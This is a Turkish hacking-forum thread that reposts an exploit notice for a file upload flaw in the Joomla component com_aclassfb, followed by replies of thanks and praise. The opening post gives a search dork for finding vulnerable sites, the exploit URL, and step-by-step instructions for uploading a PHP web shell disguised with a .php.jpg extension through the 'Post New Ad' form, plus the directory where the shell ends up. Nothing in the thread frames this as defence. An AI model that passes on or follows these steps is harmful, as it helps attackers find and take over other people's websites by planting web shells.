Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Joomla com_aclassfb File Upload Vulnerability
DaRKNeSS
*
avatar
Binbaşı
Durum: Çevrimdışı
Seviye Puanı: 53
Yaşam Puanı: 1,315 / 1,315
Deneyim: 60 / 100
Rep Sayısı: 121
Mesaj Sayısı: 5584
Üyelik Tarihi: 11.08.2013
     
Yorum: #1
Joomla com_aclassfb File Upload Vulnerability
20.01.2014 10:31
#Title : Joomla com_aclassfb File Upload Vulnerability
#Author : DevilScreaM
#Date : 10 January 2014
#Category : Web Applications
#Vendor : http://www.almondsoft.com
#Type : PHP
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
#Tested : Mozila, Chrome, Opera -> Windows & Linux
#Vulnerabillity : File Upload
#Dork : inurl:com_aclassfb

File Upload

PHP Kod:
http://127.0.0.1/index.php?option=com_aclassfb 

Exploit :
PHP Kod:
http://127.0.0.1/index.php?option=com_aclassfb&Itemid=[ID]&ct=[CATEGORY]&md=add_form 
POC :
1. kategori Seçiniz
2. Select Category sonra, “Post New Ad” tıklayın
PHP Kod:
http://127.0.0.1/index.php?option=com_aclassfb&Itemid=[ID]&ct=[CATEGORY]&md=add_form 
3. Yüklenecek shell
PHP Kod:
extension : .php .php.jpg etc 
Shell yolu:
PHP Kod:
http://127.0.0.1/component/com_aclassfb/photos/ 
Find Your Shell
(Bu konu en son: 20.01.2014 Tarihinde, Saat: 10:32 düzenlenmiştir. Düzenleyen: DaRKNeSS.)


Alinti
#H4CK4L
*
avatar
#R00T
Durum: Çevrimdışı
Seviye Puanı: 43
Yaşam Puanı: 1,050 / 1,050
Deneyim: 1 / 100
Rep Sayısı: 1038
Mesaj Sayısı: 2996
Üyelik Tarihi: 04.05.2013
      
Yorum: #2
Cvp: Joomla com_aclassfb File Upload Vulnerability
20.01.2014 11:57
eline sağlık, bu joomle bir sitabil hale gelemedi (saf hali stabildir eklentiler acık yaratır) Smile Smile

Çocukken her akşam yatmadan önce Tanrı'ya bana bir bisiklet vermesi için dua ederdim. Bir gün Tanrı'nın çalışma tarzının bu olmadığını anladım. Ertesi gün gittim kendime yeni bir bisiklet çaldım ve her akşam yatmadan önce Tanrı'ya günahlarımı affetmesi için dua ettim.
Alinti
DaRKNeSS
*
avatar
Binbaşı
Durum: Çevrimdışı
Seviye Puanı: 53
Yaşam Puanı: 1,315 / 1,315
Deneyim: 60 / 100
Rep Sayısı:
Mesaj Sayısı: 5584
Üyelik Tarihi: 11.08.2013
     
Yorum: #3
Cvp: Joomla com_aclassfb File Upload Vulnerability
20.01.2014 13:49
Eline Sağlık Abi Exciting


Alinti
Hacker Peyami
*
avatar
Albay
Durum: Çevrimdışı
Seviye Puanı: 27
Yaşam Puanı: 325 / 664
Deneyim: 56 / 100
Rep Sayısı: 61
Mesaj Sayısı: 963
Üyelik Tarihi: 18.06.2013
      
Yorum: #4
Cvp: Joomla com_aclassfb File Upload Vulnerability
20.01.2014 23:35
eline sağlık abi Smile

Gölgede Yaşayanlar,Güneşi Göremezler...
Alinti
DaRKNeSS
*
avatar
Binbaşı
Durum: Çevrimdışı
Seviye Puanı: 53
Yaşam Puanı: 1,315 / 1,315
Deneyim: 60 / 100
Rep Sayısı:
Mesaj Sayısı: 5584
Üyelik Tarihi: 11.08.2013
     
Yorum: #5
Cvp: Joomla com_aclassfb File Upload Vulnerability
21.01.2014 19:16
Ricaederim...


Alinti



1 Ziyaretçi